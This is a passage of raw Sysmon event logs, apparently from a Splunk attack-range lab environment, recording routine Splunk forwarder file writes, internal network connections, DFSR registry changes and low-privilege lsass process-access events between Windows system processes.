Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DAE19AFFFC0C987A3EBE701F8564070,SHA256=A9899A56D7D3BC0F5BE41E72D969991B2129F610BADF4212908E0080193CE387,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:35.914{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D7F0B0F2DF1E9FB2F87B40012971A4F,SHA256=FFCED3890FEB7AC9A543D00B8D427F40F8E214C493DD801ED74EE60A96CFD3D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213632Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:35.915{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75EAA6AA2B93BB911E855D046476E7BA,SHA256=56D670E7AD8B713F5FB4955A1114D4724007F39E6972EDFF737854127D3ECEFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213631Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:33.586{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51136-false10.0.1.12-8000- 23542300x8000000000000000284491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:36.929{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=843F5D8DCEAFB6C8BC6D17BA7DE1075A,SHA256=1D2CD7BF86B004F837D014A7D10F4F14A2DED2CBE502463B40D1DF4C316C59D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213633Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:36.915{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BF3415B904DE66F70AD7A2088A5CD38,SHA256=C9104D8B6CD74C78A56456F6E34E60309AD1B7A95441001B93159A5995FB21F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213634Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:37.930{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ED79B863CDC45DF421C0596BD6E0930,SHA256=D1098427CB212465AA508C312014B66E56FF7EDE333735F8C23A100384BDA5D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:37.944{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C44241F5C8411864D0D55D13607C74A,SHA256=E28A32F45D72A194E874486918D8EDBF4DB375A87C0740971E7A5DBD0ED55A0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213635Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:38.930{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AAAB004A8050892B69F3B76A466198C,SHA256=C9F913D46A5A2887E1D33B9E32280D2582B1B1E6D53D9DD215C8ECC9F31F9FA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:38.959{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E20AD5D4B019792ED0F9D0808E198EC9,SHA256=0A62E54A6E837B9FC9E6F8F126312467931045E0000E73193829EC8D7E029AF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:39.974{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F6392C03965C8A3B9A5326FDDA6AB64,SHA256=B3FED1F155D76D537DB113C299D0DE8DE2FE2B70264D1ED5FE6C9DF2655C3E61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213636Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:39.946{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12EB513AE56FB68D9CA09DDCD940516C,SHA256=6476BDB5D6AAE71F7B8DCA2BB7FC7FB76B59C2CFFC3247E2AC827E5B57A3D9E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:36.554{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53177-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:39.374{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213637Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:40.946{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80270E3CB2236D9EFDA3525895F15BB3,SHA256=AE1C692369462CA46DCD9F4933DCFBAC3A0BB1AA394DFDE7D3E040F44E3BD090,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:38.821{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53178-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 10341000x8000000000000000284503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:40.558{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000284502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:40.558{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:40.442{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:40.442{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000284499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:40.295{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\snap.datMD5=6CF9A8767A7C5C3336EAAE94DD7E2785,SHA256=2D8683EA5F0648B85E1F5FE8784B32082818B6C42E179A2E3300CAF5FDC956EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:40.295{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\btree_records.datMD5=1A79FAAEC2C81CF6122ECABE22A9AB1D,SHA256=0CDEF564B765EC1044A5FF4DCDC57AAB7D2E3A62E2AA457D2B89C77C9D115552,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:40.295{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\btree_index.datMD5=509BA9E1023BD4FC06C0BC8063BA1873,SHA256=39058889EBF7EFBBB5E65F35E8B3268268B6B3E3AD055C0E9BD5623904581A18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213638Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:41.962{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=163C0D5ABB24C946C96CB1F10A628851,SHA256=251FF82C2B9E4A743FCDF0EAFFC41185D60D373B6F788FB114C55F5B9D5B715E,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000284512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:33:41.749{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6FC0DF5C-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6FC0DF5C-0000-0000-0000-100000000000.XML 13241300x8000000000000000284511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:33:41.749{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Config SourceDWORD (0x00000001) 13241300x8000000000000000284510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:33:41.749{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_BA30863B-E0B8-488B-829D-A0E9DE6AE59C.XML 10341000x8000000000000000284509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:41.734{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:41.734{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000284507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:41.481{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91605D5EF26484A5CC8BDE07810C9FA8,SHA256=3FAE13C927B0E96BFA2766D8090A0EEA2B42111ABE3BDCC007D0FA4757854F18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:41.481{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2141B5037A780B4C47BBF6BE113C0B2A,SHA256=6AEF9A806993048A73476EF9FADBDAA20949F1E4D949B76E64485578AC645713,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:41.026{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B43A5CA2675735F57CE9BB0B9B4E788D,SHA256=B4E3779EB1ED37A3A57BD182ABE2647EA86C76B16224F42595976D359EC61220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213640Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:42.977{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=809352B78411411B9F422FB4ADD62EF3,SHA256=210EEF906B8084615165C4414F9ED3A7AAE9AA784865BF15600A8460F48F6068,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213639Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:39.476{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51137-false10.0.1.12-8000- 354300x8000000000000000284526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:40.042{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53183-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000284525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:40.042{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53183-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000284524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:39.934{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53182-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000284523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:39.933{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53182-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000284522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:39.924{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53181-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000284521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:39.924{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53181-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000284520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:39.924{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53180-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49666- 354300x8000000000000000284519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:39.924{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53180-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49666- 354300x8000000000000000284518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:39.923{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53179-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000284517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:39.923{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53179-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 10341000x8000000000000000284516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:42.580{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 